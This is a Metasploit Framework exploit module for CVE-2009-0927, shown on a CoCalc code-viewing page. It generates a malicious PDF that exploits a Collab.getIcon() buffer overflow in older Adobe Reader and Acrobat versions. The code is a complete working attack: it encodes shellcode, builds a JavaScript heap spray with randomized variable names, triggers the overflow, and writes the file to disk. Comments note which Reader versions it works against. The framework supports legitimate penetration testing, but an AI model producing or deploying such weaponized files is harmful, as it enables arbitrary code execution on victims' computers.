CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/fileformat/adobe_geticon.rb
Views: 11784
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
require 'zlib'

7


8
class MetasploitModule < Msf::Exploit::Remote

9
  Rank = GoodRanking

10


11
  include Msf::Exploit::FILEFORMAT

12
  include Msf::Exploit::PDF

13


14
  def initialize(info = {})

15
    super(update_info(info,

16
      'Name'           => 'Adobe Collab.getIcon() Buffer Overflow',

17
      'Description'    => %q{

18
          This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat.

19
        Affected versions include < 7.1.1, < 8.1.3, and < 9.1. By creating a specially

20
        crafted pdf that a contains malformed Collab.getIcon() call, an attacker may

21
        be able to execute arbitrary code.

22
      },

23
      'License'        => MSF_LICENSE,

24
      'Author'         =>

25
        [

26
          'MC',

27
          'Didier Stevens <didier.stevens[at]gmail.com>',

28
          'jduck'

29
        ],

30
      'References'     =>

31
        [

32
          [ 'CVE', '2009-0927' ],

33
          [ 'OSVDB', '53647' ],

34
          [ 'ZDI', '09-014' ],

35
        ],

36
      'DefaultOptions' =>

37
        {

38
          'EXITFUNC' => 'process',

39
          'DisablePayloadHandler' => true

40
        },

41
      'Payload'        =>

42
        {

43
          'Space'         => 1024,

44
          'BadChars'      => "\x00",

45
        },

46
      'Platform'       => 'win',

47
      'Targets'        =>

48
        [

49
          # test results (on Windows XP SP3)

50
          # reader 7.0.5 - no trigger

51
          # reader 7.0.8 - no trigger

52
          # reader 7.0.9 - no trigger

53
          # reader 7.1.0 - no trigger

54
          # reader 7.1.1 - reported not vulnerable

55
          # reader 8.0.0 - works

56
          # reader 8.1.2 - works

57
          # reader 8.1.3 - reported not vulnerable

58
          # reader 9.0.0 - works

59
          # reader 9.1.0 - reported not vulnerable

60
          [ 'Adobe Reader Universal (JS Heap Spray)', { 'Ret' => '' } ],

61
        ],

62
      'DisclosureDate' => '2009-03-24',

63
      'DefaultTarget'  => 0))

64


65
    register_options(

66
      [

67
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.pdf']),

68
      ])

69
  end

70


71
  def exploit

72
    # Encode the shellcode.

73
    shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

74


75
    # Make some nops

76
    nops    = Rex::Text.to_unescape(make_nops(4))

77


78
    # Randomize variables

79
    rand1  = rand_text_alpha(rand(100) + 1)

80
    rand2  = rand_text_alpha(rand(100) + 1)

81
    rand3  = rand_text_alpha(rand(100) + 1)

82
    rand4  = rand_text_alpha(rand(100) + 1)

83
    rand5  = rand_text_alpha(rand(100) + 1)

84
    rand6  = rand_text_alpha(rand(100) + 1)

85
    rand7  = rand_text_alpha(rand(100) + 1)

86
    rand8  = rand_text_alpha(rand(100) + 1)

87
    rand9  = rand_text_alpha(rand(100) + 1)

88
    rand10 = rand_text_alpha(rand(100) + 1)

89
    rand11 = rand_text_alpha(rand(100) + 1)

90
    rand12 = rand_text_alpha(rand(100) + 1)

91


92
    script = %Q|

93
    var #{rand1} = unescape("#{shellcode}");

94
    var #{rand2} ="";

95
    for (#{rand3}=128;#{rand3}>=0;--#{rand3}) #{rand2} += unescape("#{nops}");

96
    #{rand4} = #{rand2} + #{rand1};

97
    #{rand5} = unescape("#{nops}");

98
    #{rand6} = 20;

99
    #{rand7} = #{rand6}+#{rand4}.length

100
    while (#{rand5}.length<#{rand7}) #{rand5}+=#{rand5};

101
    #{rand8} = #{rand5}.substring(0, #{rand7});

102
    #{rand9} = #{rand5}.substring(0, #{rand5}.length-#{rand7});

103
    while(#{rand9}.length+#{rand7} < 0x40000) #{rand9} = #{rand9}+#{rand9}+#{rand8};

104
    #{rand10} = new Array();

105
    for (#{rand11}=0;#{rand11}<1450;#{rand11}++) #{rand10}[#{rand11}] = #{rand9} + #{rand4};

106
    var #{rand12} = unescape("%0a");

107
    while(#{rand12}.length < 0x4000) #{rand12}+=#{rand12};

108
    #{rand12} = "N."+#{rand12};

109
    Collab.getIcon(#{rand12});

110
          |

111


112
    # Create the pdf

113
    #pdf = make_pdf(script)

114
    pdf = create_pdf(script)

115
    print_status("Creating '#{datastore['FILENAME']}' file...")

116


117
    file_create(pdf)

118
  end

119
end

120


121